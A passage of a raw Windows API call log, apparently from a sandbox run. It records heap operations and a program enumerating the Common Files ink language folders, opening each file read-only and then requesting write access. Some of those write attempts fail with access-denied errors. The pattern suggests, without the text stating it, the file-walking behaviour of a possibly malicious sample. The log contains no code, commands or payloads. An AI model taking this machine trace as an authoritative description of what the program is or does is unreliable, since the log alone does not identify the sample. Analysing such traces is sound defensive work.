Flags=0x0, Size=0x68) returned 0x45e18 [0085.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0085.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0085.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0085.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0085.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0085.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0085.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0085.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0085.656] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.657] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.657] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.657] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.657] AreFileApisANSI () returned 1 [0085.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 78 [0085.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0085.657] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.657] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0085.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0085.657] AreFileApisANSI () returned 1 [0085.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0085.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x50cf8 [0085.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x50cf8, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui") returned 78 [0085.657] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0085.657] GetFileType (hFile=0x360) returned 0x1 [0085.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.658] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.658] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.658] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.658] CloseHandle (hObject=0x360) returned 1 [0085.658] AreFileApisANSI () returned 1 [0085.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0085.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x50cf8 [0085.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x50cf8, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui") returned 78 [0085.658] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.658] GetLastError () returned 0x5 [0085.658] GetLastError () returned 0x5 [0085.658] SetLastError (dwErrCode=0x5) [0085.659] GetLastError () returned 0x5 [0085.659] SetLastError (dwErrCode=0x5) [0085.659] GetLastError () returned 0x5 [0085.659] SetLastError (dwErrCode=0x5) [0085.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0085.659] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.659] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.659] FindNextFileW (in: hFindFile=0x78bd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x9a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x5f7a0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x9a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓☀")) returned 0 [0085.659] FindClose (in: hFindFile=0x78bd0 | out: hFindFile=0x78bd0) returned 1 [0085.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0085.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0085.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0085.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0085.659] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0085.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0085.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0085.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0085.660] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.660] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.660] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.660] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0085.660] AreFileApisANSI () returned 1 [0085.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE", lpUsedDefaultChar=0x0) returned 57 [0085.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0085.660] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.660] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0085.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.660] AreFileApisANSI () returned 1 [0085.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0085.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE") returned 57 [0085.660] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.660] GetLastError () returned 0x5 [0085.660] GetLastError () returned 0x5 [0085.660] SetLastError (dwErrCode=0x5) [0085.660] GetLastError () returned 0x5 [0085.660] SetLastError (dwErrCode=0x5) [0085.660] GetLastError () returned 0x5 [0085.661] SetLastError (dwErrCode=0x5) [0085.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0085.661] AreFileApisANSI () returned 1 [0085.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0085.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE") returned 57 [0085.661] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.661] GetLastError () returned 0x5 [0085.661] GetLastError () returned 0x5 [0085.661] SetLastError (dwErrCode=0x5) [0085.661] GetLastError () returned 0x5 [0085.661] SetLastError (dwErrCode=0x5) [0085.661] GetLastError () returned 0x5 [0085.661] SetLastError (dwErrCode=0x5) [0085.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0085.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0085.661] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.661] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.661] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.661] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0085.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0085.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0085.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0085.661] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d14d081, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe467a929, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe467a929, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="TabIpsps.dll", cAlternateFileName="")) returned 1 [0085.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0085.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0085.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0085.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0085.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0085.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0085.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0085.662] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78bd0 [0085.662] FindNextFileW (in: hFindFile=0x78bd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c820e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.662] FindNextFileW (in: hFindFile=0x78bd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3af7a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0085.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0085.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0085.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0085.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0085.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45ef8 [0085.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0085.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0085.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0085.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0085.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0085.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0085.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0085.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.663] AreFileApisANSI () returned 1 [0085.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0085.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0085.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0085.663] AreFileApisANSI () returned 1 [0085.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85c60 [0085.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x85c60, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui") returned 73 [0085.664] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0085.664] GetFileType (hFile=0x360) returned 0x1 [0085.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85c60 | out: hHeap=0x20000) returned 1 [0085.774] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.775] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.775] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, 